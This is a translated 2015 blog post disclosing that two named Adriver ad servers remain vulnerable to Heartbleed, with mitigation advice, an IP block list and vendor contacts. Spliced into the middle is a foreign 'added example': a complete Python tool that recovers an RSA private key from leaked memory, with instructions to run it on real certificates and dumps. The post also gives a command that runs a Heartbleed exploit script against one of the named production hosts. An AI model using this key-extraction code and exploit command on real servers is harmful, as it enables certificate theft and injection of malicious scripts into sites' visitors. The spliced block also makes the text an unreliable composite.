
Heartbleed and its friends in 2015: how an advertising network endangers site visitors



On the first working day of the new year I would like to draw site owners' attention to the ads they publish. Does your site run over HTTPS, and do all of its advertising scripts? Do you run current software versions and support only secure protocols and cipher suites? And does the advertising system you embed?

Heartbleed (CVE-2014-0160) is a bug in OpenSSL's handling of TLS heartbeat messages that lets an unauthenticated client read up to 64 kilobytes of the server process's memory per request, and the request can be repeated as many times as the attacker likes (a vulnerable client can be read the same way by a malicious server). The bug was introduced in March 2012, and the vulnerability was published on April 8, 2014 (nine months ago).

Articles on Habré:
Critical vulnerability in OpenSSL 1.0.1 and 1.0.2-beta
Implications of OpenSSL HeartBleed
What else does Heartbleed threaten a simple user with?
During the Christmas holidays I was setting up HTTPS on a friend's website. Eliminating mixed content (HTTP resources loaded on an HTTPS page) took several hours. When I was nearly done, I noticed a browser warning while scrolling down the page:



What, another one? Let's look at the console:



Here is the script:



Nothing unusual so far: the Adriver HTTPS script loads an Advertur script over plain HTTP. But another warning caught my attention:
content.adriver.ru: server does not support RFC 5746, see CVE-2009-3555
This warning means the server does not support secure renegotiation, i.e. the renegotiation_info extension from RFC 5746 that closes the TLS renegotiation injection attack tracked as CVE-2009-3555. You can confirm it without a browser: openssl s_client -connect host:443 prints "Secure Renegotiation IS NOT supported" for such a server. So I decided to test Adriver's servers on SSL Labs:



All the content servers except the second and fourth were rated C because they are vulnerable to POODLE against SSLv3. But why did the second and fourth get an F? Maybe they still support SSLv2? Or insecure renegotiation? Maybe they are vulnerable to CVE-2014-0224 (the OpenSSL ChangeCipherSpec injection), as Habr itself was for half a year (we are not robots)? Or to POODLE against TLS, as is often the case with banks and electronic payment systems? The list could go on: anonymous cipher suites and other weaknesses.

But the truth turned out to be worse:





Two Adriver servers that serve JavaScript are still vulnerable to the most notorious bug in OpenSSL's history. Their process memory holds referrers, IP addresses, cookies, user agents and so on, and any client on the Internet can read it.

217.16.28.104 - masterh4.adriver.ru
217.16.18.206 - masterh5.adriver.ru

What does this mean in practice? The servers use a certificate valid for all Adriver subdomains until the end of February 2016. An attacker who recovers the certificate's private key from the server's memory can impersonate any Adriver host and silently replace the JavaScript delivered to visitors of every site that embeds Adriver advertising (Habr is among them). Even without the key, the leaked cookies and referrers are already a breach, and a certificate that has sat in the memory of a Heartbleed-vulnerable server must be treated as compromised: the key should be regenerated and the old certificate revoked after patching.
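To show why a memory leak turns into a stolen certificate key, here is an added example (my own code, not from the post or from any tool it mentions): it generates a toy 1024-bit RSA key, plants one of its primes in a constructed 64 KB "heartbeat dump" of random filler, and recovers the full private exponent from that dump the way the post-Heartbleed key-extraction tools did: slide a window the size of one prime across the dump and test whether it divides the public modulus from the certificate. The seed values, the dump layout and the prime generator are my assumptions for the demo; the point is that nothing but the public certificate and the dump is needed.

```python
"""Recover an RSA private key from a leaked memory dump (added example).
Toy key, constructed dump; the scan itself is the real technique."""
import random


def is_probable_prime(n, rounds=24, rng=random):
    """Miller-Rabin; fine for a demo key (use a real library for real keys)."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits, rng):
    while True:
        candidate = rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # top and low bit set
        if is_probable_prime(candidate, rng=rng):
            return candidate


def gen_rsa(bits=1024, e=65537, seed=2015):
    """Deterministic toy key (seeded so the demo is repeatable): (n, e, d, p, q)."""
    rng = random.Random(seed)
    while True:
        p, q = gen_prime(bits // 2, rng), gen_prime(bits // 2, rng)
        if p != q and (p - 1) % e and (q - 1) % e:  # e must be invertible mod phi
            break
    phi = (p - 1) * (q - 1)
    return p * q, e, pow(e, -1, phi), p, q


def find_factor(dump, n):
    """Scan a memory dump for a prime factor of the public modulus n.

    Each window of half the modulus size is read both little- and big-endian:
    OpenSSL's BIGNUM keeps its limbs little-endian on x86, so the prime sits in
    memory byte-reversed.  Returns (offset, byteorder, p) or None."""
    size = (n.bit_length() + 7) // 8 // 2
    for offset in range(len(dump) - size + 1):
        window = dump[offset:offset + size]
        for order in ("little", "big"):
            candidate = int.from_bytes(window, order)
            # a prime of this size has its top bit set; cheap filter before the modulo
            if candidate >> (size * 8 - 1) and 1 < candidate < n and n % candidate == 0:
                return offset, order, candidate
    return None


def recover_private_key(dump, n, e):
    """From one found factor to the full private exponent, as an attacker would."""
    hit = find_factor(dump, n)
    if hit is None:
        return None
    p = hit[2]
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def constructed_dump(p, seed=7):
    """Fake 64 KB dump: random filler with p stored little-endian at offset 30000,
    mimicking a BIGNUM limb array on a little-endian host.  Constructed data."""
    rng = random.Random(seed)
    size = (p.bit_length() + 7) // 8
    filler = lambda k: bytes(rng.getrandbits(8) for _ in range(k))
    return filler(30000) + p.to_bytes(size, "little") + filler(64 * 1024 - 30000 - size)


if __name__ == "__main__":
    n, e, d, p, q = gen_rsa()
    dump = constructed_dump(p)
    print("factor hit:", find_factor(dump, n)[:2])
    print("private exponent recovered:", recover_private_key(dump, n, e) == d)
```

On a real dump you take n and e from the server's certificate (openssl x509 -noout -modulus) and concatenate every heartbeat reply you collected; the scan is linear in the dump size, so gigabytes of captured memory are still cheap to search.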

Exploiting the vulnerability with a Python script:
python heartbleed.py masterh4.adriver.ru -n 100 -a dump.txt
This command will send 100 heartbeat messages to masterh4.adriver.ru and store the received data in dump.txt.

Video:



Conclusions and precautions:
1. Before installing advertising and tracking services, test their security. Do not leave your site and its visitors exposed.
2. Consider whether advertising and tracking belong on HTTPS sites at all. Never load third-party scripts on order-processing pages, as Yves Rocher does, for example.



Guaranteed!



3. Site visitors should block ads and trackers. A more radical option is to block connections to all Adriver servers:

83.222.14.88
217.16.28.104
217.16.18.207
217.16.18.206
77.109.110.134
217.16.18.163
217.16.18.213
77.109.85.18
217.16.18.214
83.222.14.222
81.222.128.98
195.209.111.3
195.209.111.2
81.222.128.22
81.222.128.23

Where to report the vulnerability:

Adriver
support@adriver.ru

Moscow, Pokrovsky Boulevard, 3, building 1B
(495) 981-34-00

St. Petersburg, st. Savushkina, 83, Bldg. 3, letter A, (business center "Antares"), 6th floor
(812) 438-10-74

Masterhost
Multichannel phones
(495) 772-97-20
(495) 956-97-20
Free phone for regions
8-800-200-97-20

Technical support support@masterhost.ru
Information about found vulnerabilities by security@masterhost.ru

Thawte (issuer of the Adriver certificate)
Chat - www.thawte.com/chat/chat_intro.html
Phone numbers - www.thawte.com/about/contact/index.html (Certificate Order Processing)

And may all your wishes come true!

Source: https://habr.com/ru/post/247621/